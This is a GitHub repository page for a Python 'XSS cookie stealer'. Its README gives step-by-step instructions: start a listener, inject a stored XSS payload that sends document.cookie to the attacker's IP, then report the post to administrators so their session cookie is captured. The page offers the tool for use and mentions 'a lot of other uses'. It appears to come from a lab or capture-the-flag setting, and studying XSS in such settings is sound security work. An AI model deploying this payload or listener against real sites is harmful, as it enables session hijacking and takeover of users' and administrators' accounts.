Skip to content

Grizzy529/XSS-cookie-stealer.py

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 

Repository files navigation

XSS-cookie-stealer.py

I recreated it with Python 3 because it is a very old repository. The original author of this is @lnxg33k at github.com.

This is my circumstance, and I have the option of reporting to the admins button!, but there are a lot of other uses as well.

How to use

1- Change IP address in the script.

image

2- Run the script.

python3 XSS-cookie-stealer.py

image

3- Create a new listing and enter the exploit script.

<script>var i=new Image;i.src="http://(Your IP):8888/?"+document.cookie;</scirpt>

image

4- As soon as we submit, we should see our cookie appear on the http server running on our attack machine:

image

5- Let’s now click on the link and report listing to the admins:

image

6- Click ‘Report’ button and we should see the admin cookie appear on our http server:

image

About

It's an old repo, so I re-create in python3. This orginal creator is is https://github.com/R0B1NL1N

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages